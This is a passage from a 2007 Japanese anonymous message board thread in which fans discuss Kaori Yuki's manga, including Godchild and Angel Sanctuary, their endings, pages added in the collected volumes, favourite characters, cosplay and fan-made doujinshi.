同人オタごときが批評家ぶっていいかげんなことを言ってたけど
態度の悪い人がいると先品のイメージも悪くなるのを自覚してほしーわ。

148 :花と名無しさん:2007/11/06(火) 17:47:45 ID:???0
>>145
ここにも少数派が1人
自分は伏線を張り終わったあたり(カストラートら辺?)から
毎回楽しくて仕方なかったよ

149 :花と名無しさん:2007/11/06(火) 19:20:00 ID:???O
いやいや君達、ゴッチャは二回も舞台化されてますよ。
当然ながら出版社公認、作者公認ですけど。
ネットであら探しより、一万倍は高尚ですな。
つか、由貴ファンの花形はコスプレだな〜。
魔女コスしたいっす。

150 :花と名無しさん:2007/11/06(火) 23:03:51 ID:???0
と、ドロテア(解放前…Fくらい?)体型小悪魔顔の
>>149たんがおっしゃっておいでです。
ハァハァハァ。


151 :花と名無しさん:2007/11/06(火) 23:14:11 ID:???0
レイヤーっていったらどこかよその国の
天禁レイヤーが凄かったね。

>>147
ゴッチャで同人? どんな無名ですかありえない

152 :花と名無しさん:2007/11/07(水) 09:06:20 ID:???0
>>145
>>148
ここにも仲間がいます。
ラストでは不覚にも泣いたよ。

153 :花と名無しさん:2007/11/07(水) 12:13:05 ID:???O
カシジザがよかっただけに、あれは萎えたよ…

154 :花と名無しさん:2007/11/07(水) 21:30:38 ID:???0
惰性で読んでるけど、転勤以来感動はないな
勢いがないっつーかね・・・

155 :花と名無しさん:2007/11/08(木) 00:28:09 ID:???0
>>151
日本人では無理のあるキャラが多いし。
逆に出来そうなキャラって誰だ?って感じ。

>>152
泣かなかったけれど、旧シリーズだけでいいにも与しがたいんで、もっと少数の中間派かも。

156 :花と名無しさん:2007/11/08(木) 01:10:20 ID:???0
時々でいいから話題にも上がらない香水の奴も思い出してください

ヒロインと3話に出てくる友達の自己中心っぷりは痛かったけど

157 :花と名無しさん:2007/11/08(木) 06:52:09 ID:???O
螺子の続きマダー

転勤はキラカトに尽きる

158 :花と名無しさん:2007/11/08(木) 19:31:20 ID:???0
>>156
友達って生死不明の人?
私は変態っぽくてちょっと好きw

159 :156:2007/11/08(木) 21:43:54 ID:???0
>>158
いや、3話のヒロインの友達の方
初対面の相手に(香水嫌いとは言え)当り散らすのはどうよ?と思ったんで

160 :花と名無しさん:2007/11/08(木) 22:33:30 ID:???O
ドラマ化してくれ〜実写はやっぱいいっす。
でもやっぱ二次元?美人レイヤー見てぇ〜!
天禁はイラもウェブ小説もいっぱいあったろ→ね。見てぇ×見てぇ!
でも少年残像は名作!

161 :158:2007/11/08(木) 23:15:23 ID:???0
>>159
3話はその話だったか。私も最初はどうよ?って思ったけど、
読み進めたらややメンヘラ風味な子って感じだったからそれなら仕方がないなーとw

162 :花と名無しさん:2007/11/08(木) 23:41:18 ID:???0
>>156
ドラマ化されたのに話題にも上がらない乳キャラ絶無のホストも思い出してやってください。

>>160
ドラマは北欧の美男とロシアの美少女がかなり要りそうだな。

逆にこのキャストは嫌だを挙げる?

163 :花と名無しさん:2007/11/08(木) 23:42:41 ID:???0
旧カインシリーズが好きすぎたんで(天禁も大好きなのにも関わらず、天禁連載中
続きをずっと心待ちにしてた)それでゴッチャに不満を感じてしまうところはあるが、
ゴッチャはゴッチャで好きだな(中盤の絵は好きじゃないが)
最初のへんの短編と、悲劇だけど本人的には幸せ?って感じの終わり方が
大好きだった。オーガスタオチはいやだけど。マリーかわいいし。
そしてドクターは由貴キャラで最萌かも。

奏香師はあれで終わりなのかな?
やっとめでたく変態さんが出てきたというのに!

164 :花と名無しさん:2007/11/08(木) 23:56:46 ID:???O
>>158
自分もあの人の変態っぷりが好き
復讐のために女になるなんて間違った方向に完璧主義www

165 :花と名無しさん:2007/11/09(金) 05:37:32 ID:???O
変態さんより>>164の突っ込みの方がワロタwww

確かに間違った方向に完璧求めすぎww


166 :花と名無しさん:2007/11/11(日) 02:22:11 ID:???O
ゴッチャは三巻くらいまでと最終回が神
最終回はいまだに切り抜きとってある。花ゆめ掲載時の最終頁にはいまだにゾクッとくる・・・
由貴たんはgdgdになった話を強引に最終回で納得させるのが上手いな 転勤もそうだ

167 :花と名無しさん:2007/11/11(日) 04:14:47 ID:???0
単行本と雑誌は違うの?>最終頁

168 :花と名無しさん:2007/11/11(日) 08:33:21 ID:???0
ラストページは一緒だよ
けど最終巻は10ページくらいは描き足しがある

169 :花と名無しさん:2007/11/11(日) 18:22:05 ID:???O
『だってあの時彼は―』

で、めくったら

『いつものように優雅に笑む』でエンド

文章として繋がってないけど、余計な語りナシでいきなりカインの笑顔に繋げた本誌の方が
インパクトあって好きだった

170 :花と名無しさん:2007/11/11(日) 23:28:45 ID:???0
>>168-169
そうなのか、コミックス派の自分は知らなかったよ
総ページ数で10Pということは、描き足し部分はところどころ散らばってるのか
気になるなぁ…

171 :花と名無しさん:2007/11/11(日) 23:34:56 ID:???0
つじつまは最小限あわせてほしいわ
しらける

172 :花と名無しさん:2007/11/12(月) 19:54:51 ID:???0
加藤の最後も本誌掲載時のがよかったなあ
単行本でいきなり吉良が出てきてびっくりした

173 :花と名無しさん:2007/11/12(月) 20:56:17 ID:???0
誰も求めてない書き足しするよね

174 :花と名無しさん:2007/11/13(火) 00:10:51 ID:???O
自分はあの描き足し好き。もう何も思い出せない、ってのも加藤らしいけど
吉良の「終わったじゃん」の一言で加藤は戦いを終えることが出来たんだな、って思えた
てか両方買ってて本誌は切り取って残してるから、描き足しは基本的に嬉しい

175 :花と名無しさん:2007/11/13(火) 00:22:15 ID:???0
魔王の小物度が上がって嫌

176 :花と名無しさん:2007/11/13(火) 02:24:30 ID:???O
由貴漫画のキャラの本質はみんな小物

177 :花と名無しさん:2007/11/13(火) 20:10:16 ID:???0
由貴とオオグレの話に突っ込みを入れたら負けだと思う

178 :花と名無しさん:2007/11/14(水) 10:55:45 ID:???0
描き足しは本誌見ると違和感あるから嫌だな
天禁最終回も微妙に足されててあれ?と思った

179 :花と名無しさん:2007/11/14(水) 13:27:52 ID:gi7bttGX0

由貴先生の場合。番外編とか、書き足したりすると必要以上に蛇足に思える。

180 :花と名無しさん:2007/11/14(水) 18:18:10 ID:???O
>>177

自分はその二人が大好き過ぎて困る

181 :花と名無しさん:2007/11/14(水) 19:44:37 ID:???O
デッサン力が違いすぎ

182 :花と名無しさん:2007/11/15(木) 11:23:52 ID:???0
無駄にシリーズモノが多いよね。
ルーイとカインが、とりあえず完結したけど。
あと夜型と奏香師、ネジ、サイコノッカーと4つも・・・。
全部完結させるつもりあるのかな?

183 :花と名無しさん:2007/11/15(木) 12:34:35 ID:???O
どーでも続けられるよーにしとけばいいじゃん

184 :花と名無しさん:2007/11/15(木) 18:31:16 ID:???O
2年くらい前に全巻買ったものの、放置してた天禁をやっと読んだけど、
ザフィケルとラジエルの最後のシーンに号泣…。
ザフィケルが自分の好みなのもあるけど、実は親子って設定に弱い…orz

こんなにいいマンガだったなんて気づかなかったよ。
読んだらブクオフに売るつもりだったけどやめました。


185 :花と名無しさん:2007/11/15(木) 22:47:46 ID:???O
自分はネジさえ読めれば他は放置でもいい

186 :花と名無しさん:2007/11/15(木) 23:00:34 ID:???0
転勤は圧巻のシーンがいっぱいあって選べない

加藤の最後とか、ライラとニドヘッグとか、
ザフィとラジくんのお別れシーンとか
ティアラのシーンも、メタトロンのもよかったなぁ・・・

187 :花と名無しさん:2007/11/16(金) 00:39:58 ID:???0
圧巻の極みはロシエルの超絶変態なシーンだろ。変態でない時間が絶無だけど。

188 :花と名無しさん:2007/11/16(金) 09:22:14 ID:???0
ロシエルの変態シーンって6巻の加担との
例のシーン?
加担かっこいいよ加担。

前から思ってたけど由貴タンて本当に男より女のほうが
描くの楽しいんだろうか。
それならなぜ男のほうが出番が多いんだ?
動かしやすいのかな。

189 :花と名無しさん:2007/11/16(金) 23:12:51 ID:???0
描いてて楽=男
描いてて楽しい=おにゃのこ

なんじゃ?がゆんも女描く方が楽しいっぽい事書いてたし

190 :花と名無しさん:2007/11/17(土) 00:41:13 ID:???O
がゆんもだが、由貴は女の胸は描くの上手い

両方雰囲気オンリーで押し切る漫画描くのだな…

191 :花と名無しさん:2007/11/17(土) 00:42:14 ID:???0
ファッションや髪型は女の子の方がいじれるからね

192 :花と名無しさん:2007/11/19(月) 22:57:11 ID:???0
>>191
それが楽しいみたいなコメントどっかでしてた気がする。

193 :花と名無しさん:2007/11/19(月) 23:50:25 ID:???0
そらそうだべ

なんぼいい男でも、見てくれを飾るのには限度がある
ロシエルは例外として

194 :花と名無しさん:2007/11/19(月) 23:56:30 ID:???0
おいおい、ロシエルは見てくれを飾っているといえるのか。

ルーイ以上に「脱いだらすごい」を実践している時の方がよほどインパクトがある。


そういや、アレクはある意味>>191の例外だな。ある意味ロシエル的にwいじってない。

195 :花と名無しさん:2007/11/20(火) 00:10:33 ID:???0
マリーは(服と髪をいじれるから描くのが)好きって言ってたな〜

196 :花と名無しさん:2007/11/20(火) 00:19:05 ID:???0
刹那入りのアレクお姉様や九雷たんのお洋服も萌えだったよ

197 :花と名無しさん:2007/11/20(火) 10:20:46 ID:???0
普段男にしか萌えない自分も暗いタンの衣装は萌えたなあ。
褐色の肌に白い女の子らしい服が似合ってた。

198 :花と名無しさん:2007/11/21(水) 00:05:33 ID:???0
>>196
中の人が刹那の時のアレクお姉たまの衣装は、九雷の着せ替え人形なのか、刹那のシュミなのかどっちだ?
どっちにしても変態っぽいぞ。

199 :花と名無しさん:2007/11/21(水) 00:39:44 ID:???O
アラクネとクライ二人の趣味だと思ってました

200 :花と名無しさん:2007/11/21(水) 19:15:21 ID:???O
久々に天禁よんだんだけど、三巻のセビーとメタのやり取りが微笑ましい

201 :花と名無しさん:2007/11/22(木) 00:07:55 ID:???0
サラは美少女だけど出番や場面のつなぎの都合があるから
作中内であんまりお着替えができなかったね


202 :花と名無しさん:2007/11/22(木) 00:26:47 ID:???0
>>199
アラクネと九雷が刹那入りアレクをお着替えさせてる風景は凄そうだな。

>>201
刹那入りアレクを見て「負けた…」と言う紗羅。

203 :花と名無しさん:2007/11/22(木) 00:26:58 ID:???0
皿は衣装以前に性格に問題が…

204 :花と名無しさん:2007/11/22(木) 00:29:25 ID:???0
でも作者のお気に入りだよな>皿
メレといいイタイ娘すきなんかね

205 :花と名無しさん:2007/11/22(木) 01:05:49 ID:???0
サラもメレも懸命にガンバってたし、いい子だよ。

主人公に最初から愛されてるから、嫌われるんじゃないかなぁ。
またこれがぶっちぎりのものすごい美少女だからね〜。
恋愛物の定番として、片思いの相手にやっと振り向いてもらったり
素直になれなくて反発していたけどやっと思いが通じた!みたいな
そこに至るまでの過程を評価する面があるでしょ?

両思いになるまでがどうこうというストーリー設定ではないから、
最初っから美人で愛されててずるい、気に入らない、みたいな
妬みを買いやすいんだと思うよ。
それ以外のところでどんなに苦労してたり辛い目にあってても、
やっぱ女が女を見る目はキツイから、
なにこいつ努力もしないで彼氏ゲットしてんの?とまあ、そういう
心理じゃないかなー?

206 :花と名無しさん:2007/11/22(木) 03:52:19 ID:???0
違うと思うなー
美人で愛されてるキャラが嫌われていると嫉妬だ、とよく言われるけど
それってバカップルがはばかりもなくイチャイチャしてて気分を害しているのに対して
「自分に彼氏が居ないから妬んでるんでしょ」
って言う位ズレてる。

自分的には紗羅もメレも悲劇に酔いすぎなのが好きになれないところ。
メレがエメラインの血肉を吸ってるシーンとかそれを理由にカインを拒否るシーンとか
すごく嫌な感じ。
なんつか、自分が誰かの犠牲の上に立ってることを、相手の立場じゃなくて
自分の立場で解釈して悲しんでるあたりがキライ。
紗羅はインサンダルしてる以外はあんまり気にならんけどね。

207 :花と名無しさん:2007/11/22(木) 08:14:49 ID:???O
一般論に噛みつかなくても。別におまいが攻撃されてるワケではない罠…

○○嫌い!△△のが健気じゃん!みたいな話がでることあるよね。
メレの方なんて不美人の思い込みが話の重要なポイントだ。
なにも男は□□がブスだから嫌いだと言ってるのではなく
○○が好きなだけだったりするのだが、当事者は美人は愛されると思いがち。

208 :花と名無しさん:2007/11/22(木) 11:46:30 ID:???0
おいおい何だこの流れw
しょせんユキタソの趣味なんだからさ〜しょうがないじゃん。

女の子は転勤のリル(だっけ)がかわいくって好きだった。
ユキマンガの女の子に萌えたければ脇役にいくらでも
魅力的な子がいるよ。
メインヒロインはスルーでおk

209 :花と名無しさん:2007/11/22(木) 16:23:00 ID:???0
由貴漫画の男の人に萌えてる


         ∧_∧   ┌─────────────────
       ◯( ´∀` )◯ < 僕はジザベル・ディズレーリちゃん!!
        \    /  └─────────────────
       _/ __ \_
      (_/   \_)
           lll


210 :花と名無しさん:2007/11/22(木) 18:27:08 ID:???O
ゴッチャはジザベルたんが全てだからナ〜
いやまじでいいよ〜。さすが由貴たんのお気にだよナ〜。

211 :花と名無しさん:2007/11/22(木) 22:32:12 ID:???O
由貴タンの描く、主人公に執着する敵役はステキすぐる
儚げっつーか刹那的っつーか。ジザ、ロシ、砂牙、トカゲ・・・みんな好みだ

212 :花と名無しさん:2007/11/23(金) 00:15:03 ID:???0
イカレ気味で言動が酔っ払ってるほど
萌える

213 :花と名無しさん:2007/11/23(金) 01:29:23 ID:???0
>>211
「刹那」的ね。
確かに兄弟姉妹に執着する奴ばかりだが。

>>212
変態ほど萌える、の具体的な説明だね。
本人がいかれても酔っ払ってもいないと思っているところがポイントだ。


214 :花と名無しさん:2007/11/23(金) 11:36:45 ID:???O
>>213
( ゚д゚ )

215 :花と名無しさん:2007/11/23(金) 23:08:53 ID:???0
つかぬことを伺いますが。

天禁のアンハッピーエンドバージョンの話の筋というのは、
公表されているのでしょうか?
無道兄妹の死亡エンド(片方でも両方でも)だとしても
アレクかジブが復活することになるのかなーと思うと
あんましアンハッピーにも見えないので、どんなかな?と。

216 :花と名無しさん:2007/11/23(金) 23:35:38 ID:???O
公表はされてないよ。けどゴッチャのラストに代用したって説がある
どっちみちアレクやジブの復活エピは描く気はなかったと思うけど

217 :花と名無しさん:2007/11/23(金) 23:37:36 ID:???O
公表はされてないよ。けどゴッチャのラストに代用したって説がある

218 :花と名無しさん:2007/11/24(土) 09:30:26 ID:???0
二人が死んだ後どうなるんだろ?
アレクとジブリールで百合関係が発展したりするのかな?
二人の天界での愛とそれを取り巻く天使たちのドロドロ
激しく見てみたい

219 :花と名無しさん:2007/11/24(土) 10:47:43 ID:???O
転勤がゴッチャのラストだったら、悲劇的だけど
天使としては復活するから救いもあるいいラストだったかもね。
ゴッチャのはつじつまが合わないってかツギハギ間に合わせ感で
当初の世界観と全く合わない投げ出しエンドで、どうしちゃったんだろ?と
思ったけど、あれが流用というならなんとなく納得。
転勤エンド別バージョン、みてみたい!

220 :花と名無しさん:2007/11/24(土) 17:42:51 ID:???0
>>218
いやーそれはないんじゃないか

展開裁判は大々的に中継されてそうだから
天使達は皆、アレクとジブ(ただし転生パージョン)で
やってたのは知ってるだろうがなあ

天使のタマシイは不滅なんだったら、シラネじゃすまないし
なんか言われるくらいはするだろう

221 :花と名無しさん:2007/11/24(土) 22:37:40 ID:???0
天禁後日談なら
ぜひラファミカ、そーでなきゃミカクライをっ!!!!

222 :花と名無しさん:2007/11/25(日) 11:05:46 ID:???0
>>218
そゆときのために同人っつーのはあるのよ
天禁作家様がいた頃はよかった

223 :花と名無しさん:2007/11/26(月) 16:22:34 ID:???O
由貴タン新作クル━━━(゚∀゚)━━━━!!!
別花スレによると4月号(2/26発売)だって
遠いけど嬉しすぎる。今から今日発売の別花チェックしてくる

224 :花と名無しさん:2007/11/26(月) 18:53:08 ID:???0
wkwk

225 :花と名無しさん:2007/11/27(火) 00:07:12 ID:???O
新作嬉しい!

ところで http://www.amazon.co.jp/gp/aw/d.html/ref=ms_b_p_1_p1/250-3363653-9399446?ie=UTF8&tid=1196088720&a=4896273338
これのイラストが九雷にインスパイアwされてる気がしてならない

226 :花と名無しさん:2007/11/27(火) 08:46:37 ID:???O
たまにはきゃぴるん女子高生のラブ話がいい。

227 :花と名無しさん:2007/11/27(火) 18:39:24 ID:???0
>>221
ミカエルと九雷ってなんか接点あったっけ

228 :花と名無しさん:2007/11/27(火) 20:18:20 ID:???0
連載かな読みきりかな。
どっちでも楽しみだー。

229 :花と名無しさん:2007/11/27(火) 20:36:39 ID:???0
>>227
ある人にはあるんじゃね。

230 :花と名無しさん:2007/11/27(火) 20:51:47 ID:???O
>>228
読みきりらしいよ
1人目の時はだいたい半年で読み切り復帰、1年で連載復帰だった気がする
月刊だからもっと早く連載復帰するかもしれないけどまずは読みきりが楽しみ

231 :花と名無しさん:2007/11/28(水) 16:01:42 ID:???0
富樫儲の気持ちが少し分かる気分だw

232 :花と名無しさん:2007/11/29(木) 17:05:23 ID:???0
待ちきれなくて由貴たんの昔出した同人誌まで
手を出しそうになってるww
FFとバク○クでやってたんだよね
この人の同人ってホモ色強い?強いと抵抗が

233 :花と名無しさん:2007/11/29(木) 17:38:32 ID:???0
FFとバクチクどっちも持ってるがホモではない。

234 :花と名無しさん:2007/11/29(木) 19:57:14 ID:???O
痛いし嫌だ
他人の創作を汚してなんで平気なのかな

235 :花と名無しさん:2007/11/29(木) 22:19:43 ID:???O
それは由貴さんに限られた事じゃないから、此処で言っても意味ないでしょ

236 :花と名無しさん:2007/11/30(金) 11:54:41 ID:???O
てゆうか、由貴の同人をたたくのが先でしょ
本出すとか限られた範囲ならともかくネットは最低
レベル低いね

237 :花と名無しさん:2007/11/30(金) 12:24:55 ID:???0
由貴さんは自分の作品の二次を容認してたような・・・
なんかのコミックスの巻末で言ってなかったっけ?

238 :花と名無しさん:2007/11/30(金) 12:51:40 ID:???0
読者に送ってきてもらったのを読んでるって言ってたね〜
ゴッチャだっけな?

239 :花と名無しさん:2007/11/30(金) 16:54:57 ID:???0
けっこう色んなとこで見るね
同人にされるのが夢だったといってた記憶がある

240 :花と名無しさん:2007/11/30(金) 18:21:52 ID:???O
好きさんだけが触れる同人誌やコスプレはいいよね
手間暇かかるし愛がある
萌えや交流がないのや作品へのリスペクトがないのは疑問に思う
上から目線のとか図々しいよ

241 :花と名無しさん:2007/12/01(土) 15:13:03 ID:???O
ネット動じんは犯罪ですしね。由貴はやっぱりコスプレ!
ルーイで合わせしたいょ

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)